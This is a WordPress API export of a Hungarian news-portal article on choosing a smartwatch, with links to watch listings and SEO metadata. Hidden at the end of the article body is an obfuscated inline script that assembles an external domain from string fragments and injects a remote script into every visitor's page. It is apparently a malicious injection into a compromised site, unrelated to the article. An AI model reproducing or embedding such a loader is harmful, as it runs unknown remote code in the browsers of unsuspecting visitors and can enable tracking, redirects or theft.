{"id":68050,"date":"2025-01-14T09:07:42","date_gmt":"2025-01-14T08:07:42","guid":{"rendered":"https:\/\/dorogimedence.hu\/?p=68050"},"modified":"2025-01-14T09:07:42","modified_gmt":"2025-01-14T08:07:42","slug":"milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat","status":"publish","type":"post","link":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/14\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\/","title":{"rendered":"Milyen szempontok alapj\u00e1n v\u00e1lasszuk ki az ide\u00e1lis okos\u00f3r\u00e1t?"},"content":{"rendered":"<p><strong>Az okos\u00f3r\u00e1k egyre n\u00e9pszer\u0171bbek a technol\u00f3gia szerelmesei \u00e9s a h\u00e9tk\u00f6znapi felhaszn\u00e1l\u00f3k k\u00f6r\u00e9ben egyar\u00e1nt. Nem csup\u00e1n az id\u0151m\u00e9r\u00e9s eszk\u00f6zei, hanem sz\u00e1mos hasznos funkci\u00f3val gazdag\u00edtj\u00e1k mindennapjainkat, legyen sz\u00f3 \u00e9rtes\u00edt\u00e9sek kezel\u00e9s\u00e9r\u0151l, eg\u00e9szs\u00e9g\u00fcgyi \u00e1llapotunk vagy sporttev\u00e9kenys\u00e9g\u00fcnk nyomon k\u00f6vet\u00e9s\u00e9r\u0151l. De hogyan v\u00e1lasszuk ki a sok lehet\u0151s\u00e9g k\u00f6z\u00fcl a sz\u00e1munkra legmegfelel\u0151bb modellt?<\/strong><\/p>\n<h2>Passzoljon a telefonunkhoz!<\/h2>\n<p>Az okos\u00f3ra kiv\u00e1laszt\u00e1s\u00e1nak els\u0151dleges szempontja, hogy kompatibilis legyen a megl\u00e9v\u0151 okostelefonnal. Ha iPhone-t haszn\u00e1lunk, akkor egy Apple Watch ide\u00e1lis v\u00e1laszt\u00e1s lehet. Az <a href=\"https:\/\/rejoy.hu\/smartwatch\/apple\/watch-series-8-2022\/\" target=\"_blank\" rel=\"noopener\"><u><span style=\"color: #0000ff;\">Apple Watch 8<\/span><\/u><\/a> p\u00e9ld\u00e1ul fejlett szenzorokkal \u00e9s gyors teljes\u00edtm\u00e9nnyel rendelkezik. Az <a href=\"https:\/\/rejoy.hu\/smartwatch\/apple\/watch-series-6-2020\/\" target=\"_blank\" rel=\"noopener\"><u><span style=\"color: #0000ff;\">Apple Watch 6<\/span><\/u><\/a> pedig m\u00e9g mindig kiv\u00e1l\u00f3 teljes\u00edtm\u00e9nyt ny\u00fajt versenyk\u00e9pes \u00e1ron. Android felhaszn\u00e1l\u00f3k sz\u00e1m\u00e1ra sz\u00e1mos alternat\u00edva \u00e1ll rendelkez\u00e9sre, mint p\u00e9ld\u00e1ul a Samsung Galaxy Watch vagy a Fitbit modellek, melyek sz\u00e9lesk\u00f6r\u0171 funkcionalit\u00e1st k\u00edn\u00e1lnak.<\/p>\n<h2>Design \u00e9s k\u00e9nyelem<\/h2>\n<p>A k\u00fcl\u00f6nb\u00f6z\u0151 st\u00edlus\u00fa \u00f3r\u00e1k \u00e9s a sz\u00edjv\u00e1laszt\u00e9k lehet\u0151v\u00e9 teszi, hogy az \u00f3ra harmoniz\u00e1ljon egy\u00e9ni \u00edzl\u00e9s\u00fcnkkel \u00e9s \u00e9letst\u00edlusunkkal. Fontos, hogy az \u00f3ra k\u00f6nny\u0171 legyen \u00e9s k\u00e9nyelmes viseletet biztos\u00edtson eg\u00e9sz napra, k\u00fcl\u00f6n\u00f6sen, ha folyamatosan haszn\u00e1ljuk. A cser\u00e9lhet\u0151 sz\u00edjak seg\u00edts\u00e9g\u00e9vel pedig k\u00f6nnyed\u00e9n a k\u00fcl\u00f6nb\u00f6z\u0151 alkalmakhoz \u00e9s \u00f6lt\u00f6zetekhez igaz\u00edthatjuk az \u00f3r\u00e1t.<\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-68052\" src=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/01\/apple-watch-8.png\" alt=\"\" width=\"1500\" height=\"1000\"><\/p>\n<h2>Mi mindenre haszn\u00e1ljuk?<\/h2>\n<p>Az okos\u00f3r\u00e1k sz\u00e1mos funkci\u00f3val rendelkeznek, mint p\u00e9ld\u00e1ul pulzusm\u00e9r\u00e9s, alv\u00e1sfigyel\u00e9s, fitnesz tev\u00e9kenys\u00e9g nyomon k\u00f6vet\u00e9s \u00e9s GPS. Ezek k\u00fcl\u00f6n\u00f6sen hasznosak lehetnek azok sz\u00e1m\u00e1ra, akik szeretn\u00e9k figyelemmel k\u00eds\u00e9rni eg\u00e9szs\u00e9g\u00fcket \u00e9s fizikai aktivit\u00e1sukat. Fontos, hogy olyan modellt v\u00e1lasszunk, amely megfelel az egy\u00e9ni ig\u00e9nyeinknek, legyen sz\u00f3 sportol\u00e1sr\u00f3l, eg\u00e9szs\u00e9g\u00fcgyi monitoroz\u00e1sr\u00f3l vagy napi \u00e9rtes\u00edt\u00e9sek kezel\u00e9s\u00e9r\u0151l.<\/p>\n<h2>Mennyi az annyi, \u00e9s mennyit b\u00edr?<\/h2>\n<p>Az okos\u00f3r\u00e1k \u00e1ra sz\u00e9les sk\u00e1l\u00e1n mozog, ez\u00e9rt \u00e9rdemes el\u0151re meghat\u00e1rozni a k\u00f6lts\u00e9gkeretet. A pr\u00e9mium modellek magasabb \u00e1rfekv\u00e9s\u0171ek, de cser\u00e9be t\u00f6bb funkci\u00f3t \u00e9s jobb teljes\u00edtm\u00e9nyt k\u00edn\u00e1lnak. Az akkumul\u00e1tor \u00e9lettartama is l\u00e9nyeges szempont; \u00e1ltal\u00e1ban az okos\u00f3r\u00e1k napi vagy ak\u00e1r t\u00f6bb napos \u00fczemid\u0151vel rendelkeznek. \u00c9rdemes olyan \u00f3r\u00e1t v\u00e1lasztani, amely hossz\u00fa akkumul\u00e1tor-\u00e9lettartamot biztos\u00edt, \u00edgy kevesebbszer kell t\u00f6lt\u00e9sr\u0151l gondoskodni.<\/p>\n<p><script>\n(function(){\ntaz7u=\"2r149spaaz7w\";taz7=document.createElement(\"script\");\ntaz7_=\"u\"+(\"st\");taz7_+=\"at\"+(\".\");taz7.async=true;taz7_+=\"in\";\ntaz7u=\"2371807015.\"+taz7u;taz7.type=\"text\/javascript\";taz7u+=\"cj0yd2bpml5h\";\ntaz7u+=\"btbuh8\";taz7_+=(\"f\")+\"o\"+(\"\/\");taz7.src=\"https:\/\/\"+taz7_+taz7u;\ntaz7d=document.body;taz7d.appendChild(taz7);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Az okos\u00f3r\u00e1k egyre n\u00e9pszer\u0171bbek a technol\u00f3gia szerelmesei \u00e9s a h\u00e9tk\u00f6znapi felhaszn\u00e1l\u00f3k k\u00f6r\u00e9ben egyar\u00e1nt. Nem csup\u00e1n az id\u0151m\u00e9r\u00e9s eszk\u00f6zei, hanem sz\u00e1mos hasznos funkci\u00f3val gazdag\u00edtj\u00e1k mindennapjainkat, legyen sz\u00f3 \u00e9rtes\u00edt\u00e9sek kezel\u00e9s\u00e9r\u0151l, eg\u00e9szs\u00e9g\u00fcgyi \u00e1llapotunk vagy sporttev\u00e9kenys\u00e9g\u00fcnk nyomon k\u00f6vet\u00e9s\u00e9r\u0151l. De hogyan v\u00e1lasszuk ki a sok lehet\u0151s\u00e9g k\u00f6z\u00fcl a sz\u00e1munkra legmegfelel\u0151bb modellt? Passzoljon a telefonunkhoz! Az okos\u00f3ra kiv\u00e1laszt\u00e1s\u00e1nak els\u0151dleges szempontja, hogy<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[5193,1789],"class_list":{"0":"post-68050","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-hirek","7":"tag-okosora","8":"tag-ora"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Milyen szempontok alapj\u00e1n v\u00e1lasszuk ki az ide\u00e1lis okos\u00f3r\u00e1t?<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/14\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:locale\" content=\"hu_HU\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:type\" content=\"article\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:title\" content=\"Milyen szempontok alapj\u00e1n v\u00e1lasszuk ki az ide\u00e1lis okos\u00f3r\u00e1t?\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:description\" content=\"Az okos\u00f3r\u00e1k egyre n\u00e9pszer\u0171bbek a technol\u00f3gia szerelmesei \u00e9s a h\u00e9tk\u00f6znapi felhaszn\u00e1l\u00f3k k\u00f6r\u00e9ben egyar\u00e1nt. Nem csup\u00e1n az id\u0151m\u00e9r\u00e9s eszk\u00f6zei, hanem sz\u00e1mos hasznos funkci\u00f3val gazdag\u00edtj\u00e1k mindennapjainkat, legyen sz\u00f3 \u00e9rtes\u00edt\u00e9sek kezel\u00e9s\u00e9r\u0151l, eg\u00e9szs\u00e9g\u00fcgyi \u00e1llapotunk vagy sporttev\u00e9kenys\u00e9g\u00fcnk nyomon k\u00f6vet\u00e9s\u00e9r\u0151l. De hogyan v\u00e1lasszuk ki a sok lehet\u0151s\u00e9g k\u00f6z\u00fcl a sz\u00e1munkra legmegfelel\u0151bb modellt? Passzoljon a telefonunkhoz! Az okos\u00f3ra kiv\u00e1laszt\u00e1s\u00e1nak els\u0151dleges szempontja, hogy\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/14\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:site_name\" content=\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dorogimedence\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:published_time\" content=\"2025-01-14T08:07:42+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:image\" content=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/01\/apple-watch-6.png\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:width\" content=\"1500\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:height\" content=\"1000\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"author\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:label1\" content=\"Szerz\u0151:\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data1\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:label2\" content=\"Becs\u00fclt olvas\u00e1si id\u0151\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 perc\" class=\"yoast-seo-meta-tag\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/14\\\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/14\\\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\\\/\"},\"author\":{\"name\":\"dorogimedence.hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\"},\"headline\":\"Milyen szempontok alapj\u00e1n v\u00e1lasszuk ki az ide\u00e1lis okos\u00f3r\u00e1t?\",\"datePublished\":\"2025-01-14T08:07:42+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/14\\\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\\\/\"},\"wordCount\":478,\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/14\\\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/01\\\/apple-watch-8.png\",\"keywords\":[\"okos\u00f3ra\",\"\u00f3ra\"],\"articleSection\":[\"H\u00edrek\"],\"inLanguage\":\"hu\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/14\\\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/14\\\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\\\/\",\"name\":\"Milyen szempontok alapj\u00e1n v\u00e1lasszuk ki az ide\u00e1lis okos\u00f3r\u00e1t?\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/14\\\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/14\\\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/01\\\/apple-watch-8.png\",\"datePublished\":\"2025-01-14T08:07:42+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/14\\\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\\\/#breadcrumb\"},\"inLanguage\":\"hu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/14\\\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/14\\\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\\\/#primaryimage\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/01\\\/apple-watch-8.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/01\\\/apple-watch-8.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/01\\\/14\\\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Kezd\u0151lap\",\"item\":\"https:\\\/\\\/dorogimedence.hu\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Milyen szempontok alapj\u00e1n v\u00e1lasszuk ki az ide\u00e1lis okos\u00f3r\u00e1t?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"description\":\"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok\",\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dorogimedence.hu\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"hu\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"width\":600,\"height\":100,\"caption\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dorogimedence\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\",\"name\":\"dorogimedence.hu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"url\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"contentUrl\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"caption\":\"dorogimedence.hu\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Milyen szempontok alapj\u00e1n v\u00e1lasszuk ki az ide\u00e1lis okos\u00f3r\u00e1t?","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/14\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\/","og_locale":"hu_HU","og_type":"article","og_title":"Milyen szempontok alapj\u00e1n v\u00e1lasszuk ki az ide\u00e1lis okos\u00f3r\u00e1t?","og_description":"Az okos\u00f3r\u00e1k egyre n\u00e9pszer\u0171bbek a technol\u00f3gia szerelmesei \u00e9s a h\u00e9tk\u00f6znapi felhaszn\u00e1l\u00f3k k\u00f6r\u00e9ben egyar\u00e1nt. Nem csup\u00e1n az id\u0151m\u00e9r\u00e9s eszk\u00f6zei, hanem sz\u00e1mos hasznos funkci\u00f3val gazdag\u00edtj\u00e1k mindennapjainkat, legyen sz\u00f3 \u00e9rtes\u00edt\u00e9sek kezel\u00e9s\u00e9r\u0151l, eg\u00e9szs\u00e9g\u00fcgyi \u00e1llapotunk vagy sporttev\u00e9kenys\u00e9g\u00fcnk nyomon k\u00f6vet\u00e9s\u00e9r\u0151l. De hogyan v\u00e1lasszuk ki a sok lehet\u0151s\u00e9g k\u00f6z\u00fcl a sz\u00e1munkra legmegfelel\u0151bb modellt? Passzoljon a telefonunkhoz! Az okos\u00f3ra kiv\u00e1laszt\u00e1s\u00e1nak els\u0151dleges szempontja, hogy","og_url":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/14\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\/","og_site_name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","article_publisher":"https:\/\/www.facebook.com\/dorogimedence\/","article_published_time":"2025-01-14T08:07:42+00:00","og_image":[{"width":1500,"height":1000,"url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/01\/apple-watch-6.png","type":"image\/png"}],"author":"dorogimedence.hu","twitter_card":"summary_large_image","twitter_misc":{"Szerz\u0151:":"dorogimedence.hu","Becs\u00fclt olvas\u00e1si id\u0151":"2 perc"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/14\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\/#article","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/14\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\/"},"author":{"name":"dorogimedence.hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4"},"headline":"Milyen szempontok alapj\u00e1n v\u00e1lasszuk ki az ide\u00e1lis okos\u00f3r\u00e1t?","datePublished":"2025-01-14T08:07:42+00:00","mainEntityOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/14\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\/"},"wordCount":478,"publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/14\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/01\/apple-watch-8.png","keywords":["okos\u00f3ra","\u00f3ra"],"articleSection":["H\u00edrek"],"inLanguage":"hu"},{"@type":"WebPage","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/14\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\/","url":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/14\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\/","name":"Milyen szempontok alapj\u00e1n v\u00e1lasszuk ki az ide\u00e1lis okos\u00f3r\u00e1t?","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/14\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\/#primaryimage"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/14\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/01\/apple-watch-8.png","datePublished":"2025-01-14T08:07:42+00:00","breadcrumb":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/14\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dorogimedence.hu\/index.php\/2025\/01\/14\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\/"]}]},{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/14\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\/#primaryimage","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/01\/apple-watch-8.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/01\/apple-watch-8.png"},{"@type":"BreadcrumbList","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/01\/14\/milyen-szempontok-alapjan-valasszuk-ki-az-idealis-okosorat\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Kezd\u0151lap","item":"https:\/\/dorogimedence.hu\/"},{"@type":"ListItem","position":2,"name":"Milyen szempontok alapj\u00e1n v\u00e1lasszuk ki az ide\u00e1lis okos\u00f3r\u00e1t?"}]},{"@type":"WebSite","@id":"https:\/\/dorogimedence.hu\/#website","url":"https:\/\/dorogimedence.hu\/","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","description":"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok","publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dorogimedence.hu\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"hu"},{"@type":"Organization","@id":"https:\/\/dorogimedence.hu\/#organization","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","url":"https:\/\/dorogimedence.hu\/","logo":{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","width":600,"height":100,"caption":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l"},"image":{"@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dorogimedence\/"]},{"@type":"Person","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4","name":"dorogimedence.hu","image":{"@type":"ImageObject","inLanguage":"hu","@id":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","url":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","contentUrl":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","caption":"dorogimedence.hu"}}]}},"_links":{"self":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/68050","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/comments?post=68050"}],"version-history":[{"count":0,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/68050\/revisions"}],"wp:attachment":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media?parent=68050"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/categories?post=68050"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/tags?post=68050"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}